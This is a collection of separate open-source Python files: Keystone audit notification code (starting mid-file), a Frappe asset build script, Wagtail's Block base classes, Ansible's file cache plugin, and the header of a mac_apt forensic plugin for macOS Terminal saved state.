audit_kwargs['role'] = role_id
# For backward compatibility, send both old and new event_type.
# Deprecate old format and remove it in the next release.
event_types = [self.deprecated_event_type, self.event_type]
versionutils.deprecated(
as_of=versionutils.deprecated.KILO,
remove_in=+1,
what=('sending duplicate %s notification event type' %
self.deprecated_event_type),
in_favor_of='%s notification event type' % self.event_type)
try:
result = f(wrapped_self, role_id, *args, **kwargs)
except Exception:
for event_type in event_types:
_send_audit_notification(self.action, initiator,
taxonomy.OUTCOME_FAILURE,
target, event_type,
**audit_kwargs)
raise
else:
for event_type in event_types:
_send_audit_notification(self.action, initiator,
taxonomy.OUTCOME_SUCCESS,
target, event_type,
**audit_kwargs)
return result
return wrapper
def send_saml_audit_notification(action, context, user_id, group_ids,
identity_provider, protocol, token_id,
outcome):
"""Send notification to inform observers about SAML events.
:param action: Action being audited
:type action: str
:param context: Current request context to collect request info from
:type context: dict
:param user_id: User ID from Keystone token
:type user_id: str
:param group_ids: List of Group IDs from Keystone token
:type group_ids: list
:param identity_provider: ID of the IdP from the Keystone token
:type identity_provider: str or None
:param protocol: Protocol ID for IdP from the Keystone token
:type protocol: str
:param token_id: audit_id from Keystone token
:type token_id: str or None
:param outcome: One of :class:`pycadf.cadftaxonomy`
:type outcome: str
"""
initiator = _get_request_audit_info(context)
target = resource.Resource(typeURI=taxonomy.ACCOUNT_USER)
audit_type = SAML_AUDIT_TYPE
user_id = user_id or taxonomy.UNKNOWN
token_id = token_id or taxonomy.UNKNOWN
group_ids = group_ids or []
cred = credential.FederatedCredential(token=token_id, type=audit_type,
identity_provider=identity_provider,
user=user_id, groups=group_ids)
initiator.credential = cred
event_type = '%s.%s' % (SERVICE, action)
_send_audit_notification(action, initiator, outcome, target, event_type)
def _send_audit_notification(action, initiator, outcome, target,
event_type, **kwargs):
"""Send CADF notification to inform observers about the affected resource.
This method logs an exception when sending the notification fails.
:param action: CADF action being audited (e.g., 'authenticate')
:param initiator: CADF resource representing the initiator
:param outcome: The CADF outcome (taxonomy.OUTCOME_PENDING,
taxonomy.OUTCOME_SUCCESS, taxonomy.OUTCOME_FAILURE)
:param target: CADF resource representing the target
:param event_type: An OpenStack-ism, typically this is the meter name that
Ceilometer uses to poll events.
:param kwargs: Any additional arguments passed in will be added as
key-value pairs to the CADF event.
"""
event = eventfactory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=outcome,
action=action,
initiator=initiator,
target=target,
observer=resource.Resource(typeURI=taxonomy.SERVICE_SECURITY))
for key, value in kwargs.items():
setattr(event, key, value)
context = {}
payload = event.as_dict()
notifier = _get_notifier()
if notifier:
try:
notifier.info(context, event_type, payload)
except Exception:
# diaper defense: any exception that occurs while emitting the
# notification should not interfere with the API request
LOG.exception(_LE(
'Failed to send %(action)s %(event_type)s notification'),
{'action': action, 'event_type': event_type})
emit_event = CadfNotificationWrapper
role_assignment = CadfRoleAssignmentNotificationWrapper
| |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
from frappe.utils.minify import JavascriptMinify
import warnings
from six import iteritems, text_type
import subprocess
from distutils.spawn import find_executable
"""
Build the `public` folders and setup languages
"""
import os, frappe, json, shutil, re
app_paths = None
def setup():
global app_paths
pymodules = []
for app in frappe.get_all_apps(True):
try:
pymodules.append(frappe.get_module(app))
except ImportError: pass
app_paths = [os.path.dirname(pymodule.__file__) for pymodule in pymodules]
def get_node_pacman():
pacmans = ['yarn', 'npm']
for exec_ in pacmans:
exec_ = find_executable(exec_)
if exec_:
return exec_
raise ValueError('No Node.js Package Manager found.')
def bundle(no_compress, app=None, make_copy=False, restore=False, verbose=False):
"""concat / minify js files"""
setup()
make_asset_dirs(make_copy=make_copy, restore=restore)
pacman = get_node_pacman()
mode = 'build' if no_compress else 'production'
command = '{pacman} run {mode}'.format(pacman=pacman, mode=mode)
if app:
command += ' --app {app}'.format(app=app)
frappe_app_path = os.path.abspath(os.path.join(app_paths[0], '..'))
check_yarn()
frappe.commands.popen(command, cwd=frappe_app_path)
def watch(no_compress):
"""watch and rebuild if necessary"""
setup()
pacman = get_node_pacman()
frappe_app_path = os.path.abspath(os.path.join(app_paths[0], '..'))
check_yarn()
frappe_app_path = frappe.get_app_path('frappe', '..')
frappe.commands.popen('{pacman} run watch'.format(pacman=pacman), cwd = frappe_app_path)
def check_yarn():
from distutils.spawn import find_executable
if not find_executable('yarn'):
print('Please install yarn using below command and try again.')
print('npm install -g yarn')
return
def make_asset_dirs(make_copy=False, restore=False):
# don't even think of making assets_path absolute - rm -rf ahead.
assets_path = os.path.join(frappe.local.sites_path, "assets")
for dir_path in [
os.path.join(assets_path, 'js'),
os.path.join(assets_path, 'css')]:
if not os.path.exists(dir_path):
os.makedirs(dir_path)
for app_name in frappe.get_all_apps(True):
pymodule = frappe.get_module(app_name)
app_base_path = os.path.abspath(os.path.dirname(pymodule.__file__))
symlinks = []
# app/public > assets/app
symlinks.append([os.path.join(app_base_path, 'public'), os.path.join(assets_path, app_name)])
# app/node_modules > assets/app/node_modules
symlinks.append([os.path.join(app_base_path, '..', 'node_modules'), os.path.join(assets_path, app_name, 'node_modules')])
app_doc_path = None
if os.path.isdir(os.path.join(app_base_path, 'docs')):
app_doc_path = os.path.join(app_base_path, 'docs')
elif os.path.isdir(os.path.join(app_base_path, 'www', 'docs')):
app_doc_path = os.path.join(app_base_path, 'www', 'docs')
if app_doc_path:
symlinks.append([app_doc_path, os.path.join(assets_path, app_name + '_docs')])
for source, target in symlinks:
source = os.path.abspath(source)
if os.path.exists(source):
if restore:
if os.path.exists(target):
if os.path.islink(target):
os.unlink(target)
else:
shutil.rmtree(target)
shutil.copytree(source, target)
elif make_copy:
if os.path.exists(target):
warnings.warn('Target {target} already exists.'.format(target = target))
else:
shutil.copytree(source, target)
else:
if os.path.exists(target):
if os.path.islink(target):
os.unlink(target)
else:
shutil.rmtree(target)
os.symlink(source, target)
else:
# warnings.warn('Source {source} does not exist.'.format(source = source))
pass
def build(no_compress=False, verbose=False):
assets_path = os.path.join(frappe.local.sites_path, "assets")
for target, sources in iteritems(get_build_maps()):
pack(os.path.join(assets_path, target), sources, no_compress, verbose)
def get_build_maps():
"""get all build.jsons with absolute paths"""
# framework js and css files
build_maps = {}
for app_path in app_paths:
path = os.path.join(app_path, 'public', 'build.json')
if os.path.exists(path):
with open(path) as f:
try:
for target, sources in iteritems(json.loads(f.read())):
# update app path
source_paths = []
for source in sources:
if isinstance(source, list):
s = frappe.get_pymodule_path(source[0], *source[1].split("/"))
else:
s = os.path.join(app_path, source)
source_paths.append(s)
build_maps[target] = source_paths
except ValueError as e:
print(path)
print('JSON syntax error {0}'.format(str(e)))
return build_maps
timestamps = {}
def pack(target, sources, no_compress, verbose):
from six import StringIO
outtype, outtxt = target.split(".")[-1], ''
jsm = JavascriptMinify()
for f in sources:
suffix = None
if ':' in f: f, suffix = f.split(':')
if not os.path.exists(f) or os.path.isdir(f):
print("did not find " + f)
continue
timestamps[f] = os.path.getmtime(f)
try:
with open(f, 'r') as sourcefile:
data = text_type(sourcefile.read(), 'utf-8', errors='ignore')
extn = f.rsplit(".", 1)[1]
if outtype=="js" and extn=="js" and (not no_compress) and suffix!="concat" and (".min." not in f):
tmpin, tmpout = StringIO(data.encode('utf-8')), StringIO()
jsm.minify(tmpin, tmpout)
minified = tmpout.getvalue()
if minified:
outtxt += text_type(minified or '', 'utf-8').strip('\n') + ';'
if verbose:
print("{0}: {1}k".format(f, int(len(minified) / 1024)))
elif outtype=="js" and extn=="html":
# add to frappe.templates
outtxt += html_to_js_template(f, data)
else:
outtxt += ('\n/*\n *\t%s\n */' % f)
outtxt += '\n' + data + '\n'
except Exception:
print("--Error in:" + f + "--")
print(frappe.get_traceback())
with open(target, 'w') as f:
f.write(outtxt.encode("utf-8"))
print("Wrote %s - %sk" % (target, str(int(os.path.getsize(target)/1024))))
def html_to_js_template(path, content):
'''returns HTML template content as Javascript code, adding it to `frappe.templates`'''
return """frappe.templates["{key}"] = '{content}';\n""".format(\
key=path.rsplit("/", 1)[-1][:-5], content=scrub_html_template(content))
def scrub_html_template(content):
'''Returns HTML content with removed whitespace and comments'''
# remove whitespace to a single space
content = re.sub("\s+", " ", content)
# strip comments
content = re.sub("(<!--.*?-->)", "", content)
return content.replace("'", "\'")
def files_dirty():
for target, sources in iteritems(get_build_maps()):
for f in sources:
if ':' in f: f, suffix = f.split(':')
if not os.path.exists(f) or os.path.isdir(f): continue
if os.path.getmtime(f) != timestamps.get(f):
print(f + ' dirty')
return True
else:
return False
def compile_less():
from distutils.spawn import find_executable
if not find_executable("lessc"):
return
for path in app_paths:
less_path = os.path.join(path, "public", "less")
if os.path.exists(less_path):
for fname in os.listdir(less_path):
if fname.endswith(".less") and fname != "variables.less":
fpath = os.path.join(less_path, fname)
mtime = os.path.getmtime(fpath)
if fpath in timestamps and mtime == timestamps[fpath]:
continue
timestamps[fpath] = mtime
print("compiling {0}".format(fpath))
css_path = os.path.join(path, "public", "css", fname.rsplit(".", 1)[0] + ".css")
os.system("lessc {0} > {1}".format(fpath, css_path))
| |
from __future__ import absolute_import, unicode_literals
# unicode_literals ensures that any render / __str__ methods returning HTML via calls to mark_safe / format_html
# return a SafeText, not SafeBytes; necessary so that it doesn't get re-encoded when the template engine
# calls force_text, which would cause it to lose its 'safe' flag
import collections
from importlib import import_module
from django.core import checks
from django.core.exceptions import ImproperlyConfigured
from django.utils import six
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.encoding import force_text
from django.template.loader import render_to_string
from django import forms
__all__ = ['BaseBlock', 'Block', 'BoundBlock', 'DeclarativeSubBlocksMetaclass', 'BlockWidget', 'BlockField']
# =========================================
# Top-level superclasses and helper objects
# =========================================
class BaseBlock(type):
def __new__(mcs, name, bases, attrs):
meta_class = attrs.pop('Meta', None)
cls = super(BaseBlock, mcs).__new__(mcs, name, bases, attrs)
base_meta_class = getattr(cls, '_meta_class', None)
bases = tuple(cls for cls in [meta_class, base_meta_class] if cls) or ()
cls._meta_class = type(str(name + 'Meta'), bases + (object, ), {})
return cls
class Block(six.with_metaclass(BaseBlock, object)):
name = ''
creation_counter = 0
TEMPLATE_VAR = 'value'
class Meta:
label = None
icon = "placeholder"
classname = None
"""
Setting a 'dependencies' list serves as a shortcut for the common case where a complex block type
(such as struct, list or stream) relies on one or more inner block objects, and needs to ensure that
the responses from the 'media' and 'html_declarations' include the relevant declarations for those inner
blocks, as well as its own. Specifying these inner block objects in a 'dependencies' list means that
the base 'media' and 'html_declarations' methods will return those declarations; the outer block type can
then add its own declarations to the list by overriding those methods and using super().
"""
dependencies = []
def __new__(cls, *args, **kwargs):
# adapted from django.utils.deconstruct.deconstructible; capture the arguments
# so that we can return them in the 'deconstruct' method
obj = super(Block, cls).__new__(cls)
obj._constructor_args = (args, kwargs)
return obj
def all_blocks(self):
"""
Return a list consisting of self and all block objects that are direct or indirect dependencies
of this block
"""
result = [self]
for dep in self.dependencies:
result.extend(dep.all_blocks())
return result
def all_media(self):
media = forms.Media()
for block in self.all_blocks():
media += block.media
return media
def all_html_declarations(self):
declarations = filter(bool, [block.html_declarations() for block in self.all_blocks()])
return mark_safe('\n'.join(declarations))
def __init__(self, **kwargs):
self.meta = self._meta_class()
for attr, value in kwargs.items():
setattr(self.meta, attr, value)
# Increase the creation counter, and save our local copy.
self.creation_counter = Block.creation_counter
Block.creation_counter += 1
self.definition_prefix = 'blockdef-%d' % self.creation_counter
self.label = self.meta.label or ''
def set_name(self, name):
self.name = name
if not self.meta.label:
self.label = capfirst(force_text(name).replace('_', ' '))
@property
def media(self):
return forms.Media()
def html_declarations(self):
"""
Return an HTML fragment to be rendered on the form page once per block definition -
as opposed to once per occurrence of the block. For example, the block definition
ListBlock(label="Shopping list", CharBlock(label="Product"))
needs to output a <script type="text/template"></script> block containing the HTML for
a 'product' text input, to that these can be dynamically added to the list. This
template block must only occur once in the page, even if there are multiple 'shopping list'
blocks on the page.
Any element IDs used in this HTML fragment must begin with definition_prefix.
(More precisely, they must either be definition_prefix itself, or begin with definition_prefix
followed by a '-' character)
"""
return ''
def js_initializer(self):
"""
Returns a Javascript expression string, or None if this block does not require any
Javascript behaviour. This expression evaluates to an initializer function, a function that
takes the ID prefix and applies JS behaviour to the block instance with that value and prefix.
The parent block of this block (or the top-level page code) must ensure that this
expression is not evaluated more than once. (The resulting initializer function can and will be
called as many times as there are instances of this block, though.)
"""
return None
def render_form(self, value, prefix='', errors=None):
"""
Render the HTML for this block with 'value' as its content.
"""
raise NotImplementedError('%s.render_form' % self.__class__)
def value_from_datadict(self, data, files, prefix):
raise NotImplementedError('%s.value_from_datadict' % self.__class__)
def bind(self, value, prefix=None, errors=None):
"""
Return a BoundBlock which represents the association of this block definition with a value
and a prefix (and optionally, a ValidationError to be rendered).
BoundBlock primarily exists as a convenience to allow rendering within templates:
bound_block.render() rather than blockdef.render(value, prefix) which can't be called from
within a template.
"""
return BoundBlock(self, value, prefix=prefix, errors=errors)
def get_default(self):
"""
Return this block's default value (conventionally found in self.meta.default),
converted to the value type expected by this block. This caters for the case
where that value type is not something that can be expressed statically at
model definition type (e.g. something like StructValue which incorporates a
pointer back to the block definion object).
"""
return self.meta.default
def prototype_block(self):
"""
Return a BoundBlock that can be used as a basis for new empty block instances to be added on the fly
(new list items, for example). This will have a prefix of '__PREFIX__' (to be dynamically replaced with
a real prefix when it's inserted into the page) and a value equal to the block's default value.
"""
return self.bind(self.get_default(), '__PREFIX__')
def clean(self, value):
"""
Validate value and return a cleaned version of it, or throw a ValidationError if validation fails.
The thrown ValidationError instance will subsequently be passed to render() to display the
error message; the ValidationError must therefore include all detail necessary to perform that
rendering, such as identifying the specific child block(s) with errors, in the case of nested
blocks. (It is suggested that you use the 'params' attribute for this; using error_list /
error_dict is unreliable because Django tends to hack around with these when nested.)
"""
return value
def to_python(self, value):
"""
Convert 'value' from a simple (JSON-serialisable) value to a (possibly complex) Python value to be
used in the rest of the block API and within front-end templates . In simple cases this might be
the value itself; alternatively, it might be a 'smart' version of the value which behaves mostly
like the original value but provides a native HTML rendering when inserted into a template; or it
might be something totally different (e.g. an image chooser will use the image ID as the clean
value, and turn this back into an actual image object here).
"""
return value
def get_prep_value(self, value):
"""
The reverse of to_python; convert the python value into JSON-serialisable form.
"""
return value
def render(self, value):
"""
Return a text rendering of 'value', suitable for display on templates. By default, this will
use a template if a 'template' property is specified on the block, and fall back on render_basic
otherwise.
"""
template = getattr(self.meta, 'template', None)
if template:
return render_to_string(template, {
'self': value,
self.TEMPLATE_VAR: value,
})
else:
return self.render_basic(value)
def render_basic(self, value):
"""
Return a text rendering of 'value', suitable for display on templates. render() will fall back on
this if the block does not define a 'template' property.
"""
return force_text(value)
def get_searchable_content(self, value):
"""
Returns a list of strings containing text content within this block to be used in a search engine.
"""
return []
def check(self, **kwargs):
"""
Hook for the Django system checks framework -
returns a list of django.core.checks.Error objects indicating validity errors in the block
"""
return []
def _check_name(self, **kwargs):
"""
Helper method called by container blocks as part of the system checks framework,
to validate that this block's name is a valid identifier.
(Not called universally, because not all blocks need names)
"""
errors = []
if not self.name:
errors.append(checks.Error(
"Block name %r is invalid" % self.name,
hint="Block name cannot be empty",
obj=kwargs.get('field', self),
id='wagtailcore.E001',
))
if ' ' in self.name:
errors.append(checks.Error(
"Block name %r is invalid" % self.name,
hint="Block names cannot contain spaces",
obj=kwargs.get('field', self),
id='wagtailcore.E001',
))
if '-' in self.name:
errors.append(checks.Error(
"Block name %r is invalid" % self.name,
"Block names cannot contain dashes",
obj=kwargs.get('field', self),
id='wagtailcore.E001',
))
if self.name and self.name[0].isdigit():
errors.append(checks.Error(
"Block name %r is invalid" % self.name,
"Block names cannot begin with a digit",
obj=kwargs.get('field', self),
id='wagtailcore.E001',
))
return errors
def id_for_label(self, prefix):
"""
Return the ID to be used as the 'for' attribute of <label> elements that refer to this block,
when the given field prefix is in use. Return None if no 'for' attribute should be used.
"""
return None
def deconstruct(self):
# adapted from django.utils.deconstruct.deconstructible
module_name = self.__module__
name = self.__class__.__name__
# Make sure it's actually there and not an inner class
module = import_module(module_name)
if not hasattr(module, name):
raise ValueError(
"Could not find object %s in %s.\n"
"Please note that you cannot serialize things like inner "
"classes. Please move the object into the main module "
"body to use migrations.\n"
% (name, module_name))
# if the module defines a DECONSTRUCT_ALIASES dictionary, see if the class has an entry in there;
# if so, use that instead of the real path
try:
path = module.DECONSTRUCT_ALIASES[self.__class__]
except (AttributeError, KeyError):
path = '%s.%s' % (module_name, name)
return (
path,
self._constructor_args[0],
self._constructor_args[1],
)
def __eq__(self, other):
"""
The deep_deconstruct method in django.db.migrations.autodetector.MigrationAutodetector does not
recurse into arbitrary lists and dicts. As a result, when it is passed a field such as:
StreamField([
('heading', CharBlock()),
])
the CharBlock object will be left in its constructed form. This causes problems when
MigrationAutodetector compares two separate instances of the StreamField from different project
states: since the CharBlocks are different objects, it will report a change where there isn't one.
To prevent this, we implement the equality operator on Block instances such that the two CharBlocks
are reported as equal. Since block objects are intended to be immutable with the exception of
set_name(), it is sufficient to compare the 'name' property and the constructor args/kwargs of the
two block objects. The 'deconstruct' method provides a convenient way to access the latter.
"""
if not isinstance(other, Block):
# if the other object isn't a block at all, it clearly isn't equal.
return False
# Note that we do not require the two blocks to be of the exact same class. This is because
# we may wish the following blocks to be considered equal:
#
# class FooBlock(StructBlock):
# first_name = CharBlock()
# surname = CharBlock()
#
# class BarBlock(StructBlock):
# first_name = CharBlock()
# surname = CharBlock()
#
# FooBlock() == BarBlock() == StructBlock([('first_name', CharBlock()), ('surname': CharBlock())])
#
# For this to work, StructBlock will need to ensure that 'deconstruct' returns the same signature
# in all of these cases, including reporting StructBlock as the path:
#
# FooBlock().deconstruct() == (
# 'wagtail.wagtailcore.blocks.StructBlock',
# [('first_name', CharBlock()), ('surname': CharBlock())],
# {}
# )
#
# This has the bonus side effect that the StructBlock field definition gets frozen into
# the migration, rather than leaving the migration vulnerable to future changes to FooBlock / BarBlock
# in models.py.
return (self.name == other.name) and (self.deconstruct() == other.deconstruct())
def __ne__(self, other):
return not self.__eq__(other)
# Making block instances hashable in a way that's consistent with __eq__ is non-trivial, because
# self.deconstruct() is liable to contain unhashable data (e.g. lists and dicts). So let's set
# Block to be explicitly unhashable - Python 3 will do this automatically when defining __eq__,
# but Python 2 won't, and we'd like the behaviour to be consistent on both.
__hash__ = None
class BoundBlock(object):
def __init__(self, block, value, prefix=None, errors=None):
self.block = block
self.value = value
self.prefix = prefix
self.errors = errors
def render_form(self):
return self.block.render_form(self.value, self.prefix, errors=self.errors)
def render(self):
return self.block.render(self.value)
def id_for_label(self):
return self.block.id_for_label(self.prefix)
class DeclarativeSubBlocksMetaclass(BaseBlock):
"""
Metaclass that collects sub-blocks declared on the base classes.
(cheerfully stolen from https://github.com/django/django/blob/master/django/forms/forms.py)
"""
def __new__(mcs, name, bases, attrs):
# Collect sub-blocks declared on the current class.
# These are available on the class as `declared_blocks`
current_blocks = []
for key, value in list(attrs.items()):
if isinstance(value, Block):
current_blocks.append((key, value))
value.set_name(key)
attrs.pop(key)
current_blocks.sort(key=lambda x: x[1].creation_counter)
attrs['declared_blocks'] = collections.OrderedDict(current_blocks)
new_class = (super(DeclarativeSubBlocksMetaclass, mcs).__new__(
mcs, name, bases, attrs))
# Walk through the MRO, collecting all inherited sub-blocks, to make
# the combined `base_blocks`.
base_blocks = collections.OrderedDict()
for base in reversed(new_class.__mro__):
# Collect sub-blocks from base class.
if hasattr(base, 'declared_blocks'):
base_blocks.update(base.declared_blocks)
# Field shadowing.
for attr, value in base.__dict__.items():
if value is None and attr in base_blocks:
base_blocks.pop(attr)
new_class.base_blocks = base_blocks
return new_class
# ========================
# django.forms integration
# ========================
class BlockWidget(forms.Widget):
"""Wraps a block object as a widget so that it can be incorporated into a Django form"""
def __init__(self, block_def, attrs=None):
super(BlockWidget, self).__init__(attrs=attrs)
self.block_def = block_def
def render_with_errors(self, name, value, attrs=None, errors=None):
bound_block = self.block_def.bind(value, prefix=name, errors=errors)
js_initializer = self.block_def.js_initializer()
if js_initializer:
js_snippet = """
<script>
$(function() {
var initializer = %s;
initializer('%s');
})
</script>
""" % (js_initializer, name)
else:
js_snippet = ''
return mark_safe(bound_block.render_form() + js_snippet)
def render(self, name, value, attrs=None):
return self.render_with_errors(name, value, attrs=attrs, errors=None)
@property
def media(self):
return self.block_def.all_media()
def value_from_datadict(self, data, files, name):
return self.block_def.value_from_datadict(data, files, name)
class BlockField(forms.Field):
"""Wraps a block object as a form field so that it can be incorporated into a Django form"""
def __init__(self, block=None, **kwargs):
if block is None:
raise ImproperlyConfigured("BlockField was not passed a 'block' object")
self.block = block
if 'widget' not in kwargs:
kwargs['widget'] = BlockWidget(block)
super(BlockField, self).__init__(**kwargs)
def clean(self, value):
return self.block.clean(value)
DECONSTRUCT_ALIASES = {
Block: 'wagtail.wagtailcore.blocks.Block',
}
| |
# (c) 2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import time
import errno
from abc import ABCMeta, abstractmethod
from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.module_utils.six import with_metaclass
from ansible.module_utils._text import to_bytes
from ansible.module_utils.common._collections_compat import MutableMapping
from ansible.plugins.loader import cache_loader
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class BaseCacheModule(with_metaclass(ABCMeta, object)):
# Backwards compat only. Just import the global display instead
_display = display
@abstractmethod
def get(self, key):
pass
@abstractmethod
def set(self, key, value):
pass
@abstractmethod
def keys(self):
pass
@abstractmethod
def contains(self, key):
pass
@abstractmethod
def delete(self, key):
pass
@abstractmethod
def flush(self):
pass
@abstractmethod
def copy(self):
pass
class BaseFileCacheModule(BaseCacheModule):
"""
A caching module backed by file based storage.
"""
def __init__(self, *args, **kwargs):
self.plugin_name = self.__module__.split('.')[-1]
self._timeout = float(C.CACHE_PLUGIN_TIMEOUT)
self._cache = {}
self._cache_dir = self._get_cache_connection(C.CACHE_PLUGIN_CONNECTION)
self._set_inventory_cache_override(**kwargs)
self.validate_cache_connection()
def _get_cache_connection(self, source):
if source:
try:
return os.path.expanduser(os.path.expandvars(source))
except TypeError:
pass
def _set_inventory_cache_override(self, **kwargs):
if kwargs.get('cache_timeout'):
self._timeout = kwargs.get('cache_timeout')
if kwargs.get('cache_connection'):
self._cache_dir = self._get_cache_connection(kwargs.get('cache_connection'))
def validate_cache_connection(self):
if not self._cache_dir:
raise AnsibleError("error, '%s' cache plugin requires the 'fact_caching_connection' config option "
"to be set (to a writeable directory path)" % self.plugin_name)
if not os.path.exists(self._cache_dir):
try:
os.makedirs(self._cache_dir)
except (OSError, IOError) as e:
raise AnsibleError("error in '%s' cache plugin while trying to create cache dir %s : %s" % (self.plugin_name, self._cache_dir, to_bytes(e)))
else:
for x in (os.R_OK, os.W_OK, os.X_OK):
if not os.access(self._cache_dir, x):
raise AnsibleError("error in '%s' cache, configured path (%s) does not have necessary permissions (rwx), disabling plugin" % (
self.plugin_name, self._cache_dir))
def get(self, key):
""" This checks the in memory cache first as the fact was not expired at 'gather time'
and it would be problematic if the key did expire after some long running tasks and
user gets 'undefined' error in the same play """
if key not in self._cache:
if self.has_expired(key) or key == "":
raise KeyError
cachefile = "%s/%s" % (self._cache_dir, key)
try:
value = self._load(cachefile)
self._cache[key] = value
except ValueError as e:
display.warning("error in '%s' cache plugin while trying to read %s : %s. "
"Most likely a corrupt file, so erasing and failing." % (self.plugin_name, cachefile, to_bytes(e)))
self.delete(key)
raise AnsibleError("The cache file %s was corrupt, or did not otherwise contain valid data. "
"It has been removed, so you can re-run your command now." % cachefile)
except (OSError, IOError) as e:
display.warning("error in '%s' cache plugin while trying to read %s : %s" % (self.plugin_name, cachefile, to_bytes(e)))
raise KeyError
except Exception as e:
raise AnsibleError("Error while decoding the cache file %s: %s" % (cachefile, to_bytes(e)))
return self._cache.get(key)
def set(self, key, value):
self._cache[key] = value
cachefile = "%s/%s" % (self._cache_dir, key)
try:
self._dump(value, cachefile)
except (OSError, IOError) as e:
display.warning("error in '%s' cache plugin while trying to write to %s : %s" % (self.plugin_name, cachefile, to_bytes(e)))
def has_expired(self, key):
if self._timeout == 0:
return False
cachefile = "%s/%s" % (self._cache_dir, key)
try:
st = os.stat(cachefile)
except (OSError, IOError) as e:
if e.errno == errno.ENOENT:
return False
else:
display.warning("error in '%s' cache plugin while trying to stat %s : %s" % (self.plugin_name, cachefile, to_bytes(e)))
return False
if time.time() - st.st_mtime <= self._timeout:
return False
if key in self._cache:
del self._cache[key]
return True
def keys(self):
keys = []
for k in os.listdir(self._cache_dir):
if not (k.startswith('.') or self.has_expired(k)):
keys.append(k)
return keys
def contains(self, key):
cachefile = "%s/%s" % (self._cache_dir, key)
if key in self._cache:
return True
if self.has_expired(key):
return False
try:
os.stat(cachefile)
return True
except (OSError, IOError) as e:
if e.errno == errno.ENOENT:
return False
else:
display.warning("error in '%s' cache plugin while trying to stat %s : %s" % (self.plugin_name, cachefile, to_bytes(e)))
def delete(self, key):
try:
del self._cache[key]
except KeyError:
pass
try:
os.remove("%s/%s" % (self._cache_dir, key))
except (OSError, IOError):
pass # TODO: only pass on non existing?
def flush(self):
self._cache = {}
for key in self.keys():
self.delete(key)
def copy(self):
ret = dict()
for key in self.keys():
ret[key] = self.get(key)
return ret
@abstractmethod
def _load(self, filepath):
"""
Read data from a filepath and return it as a value
:arg filepath: The filepath to read from.
:returns: The value stored in the filepath
This method reads from the file on disk and takes care of any parsing
and transformation of the data before returning it. The value
returned should be what Ansible would expect if it were uncached data.
.. note:: Filehandles have advantages but calling code doesn't know
whether this file is text or binary, should be decoded, or accessed via
a library function. Therefore the API uses a filepath and opens
the file inside of the method.
"""
pass
@abstractmethod
def _dump(self, value, filepath):
"""
Write data to a filepath
:arg value: The value to store
:arg filepath: The filepath to store it at
"""
pass
class FactCache(MutableMapping):
def __init__(self, *args, **kwargs):
self._plugin = cache_loader.get(C.CACHE_PLUGIN)
if not self._plugin:
raise AnsibleError('Unable to load the facts cache plugin (%s).' % (C.CACHE_PLUGIN))
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
# in memory cache so plugins don't expire keys mid run
self._cache = {}
def __getitem__(self, key):
if not self._plugin.contains(key):
raise KeyError
return self._plugin.get(key)
def __setitem__(self, key, value):
self._plugin.set(key, value)
def __delitem__(self, key):
self._plugin.delete(key)
def __contains__(self, key):
return self._plugin.contains(key)
def __iter__(self):
return iter(self._plugin.keys())
def __len__(self):
return len(self._plugin.keys())
def copy(self):
""" Return a primitive copy of the keys and values from the cache. """
return dict(self)
def keys(self):
return self._plugin.keys()
def flush(self):
""" Flush the fact cache of all keys. """
self._plugin.flush()
def update(self, key, value):
host_cache = self._plugin.get(key)
host_cache.update(value)
self._plugin.set(key, host_cache)
class InventoryFileCacheModule(BaseFileCacheModule):
"""
A caching module backed by file based storage.
"""
def __init__(self, plugin_name, timeout, cache_dir):
self.plugin_name = plugin_name
self._timeout = timeout
self._cache = {}
self._cache_dir = self._get_cache_connection(cache_dir)
self.validate_cache_connection()
self._plugin = self.get_plugin(plugin_name)
def validate_cache_connection(self):
try:
super(InventoryFileCacheModule, self).validate_cache_connection()
except AnsibleError as e:
cache_connection_set = False
else:
cache_connection_set = True
if not cache_connection_set:
raise AnsibleError("error, '%s' inventory cache plugin requires the one of the following to be set:\n"
"ansible.cfg:\n[default]: fact_caching_connection,\n[inventory]: cache_connection;\n"
"Environment:\nANSIBLE_INVENTORY_CACHE_CONNECTION,\nANSIBLE_CACHE_PLUGIN_CONNECTION."
"to be set to a writeable directory path" % self.plugin_name)
def get(self, cache_key):
if not self.contains(cache_key):
# Check if cache file exists
raise KeyError
return super(InventoryFileCacheModule, self).get(cache_key)
def get_plugin(self, plugin_name):
plugin = cache_loader.get(plugin_name, cache_connection=self._cache_dir, cache_timeout=self._timeout)
if not plugin:
raise AnsibleError('Unable to load the facts cache plugin (%s).' % (plugin_name))
self._cache = {}
return plugin
def _load(self, path):
return self._plugin._load(path)
def _dump(self, value, path):
return self._plugin._dump(value, path)
| |
'''
Copyright (c) 2017 Yogesh Khatri
This file is part of mac_apt (macOS Artifact Parsing Tool).
Usage or distribution of this software/code is subject to the
terms of the MIT License.
terminalstate.py
---------------
This plugin reads Terminal Saved State information which includes
full text content of terminal window.
'''
import io
import logging
import nska_deserialize as nd
import os
import struct
from Crypto.Cipher import AES
from plugins.helpers.common import CommonFunctions
from plugins.helpers.macinfo import *
from plugins.helpers.writer import *
__Plugin_Name = "TERMINALSTATE" # Cannot have spaces, and must be all caps!
__Plugin_Friendly_Name = "Terminal Saved State"
__Plugin_Version = "1.0"
__Plugin_Description = "Reads Terminal saved state files which includes full text content of terminal windows"
__Plugin_Author = "Yogesh Khatri"
__Plugin_Author_Email = "yogesh@swiftforensics.com"
__Plugin_Modes = "MACOS,ARTIFACTONLY" # Valid values are 'MACOS', 'IOS, 'ARTIFACTONLY'
__Plugin_ArtifactOnly_Usage = 'Provide the folder /Users/<USER>/Library/Saved Application State/com.apple.Terminal.savedState as input'
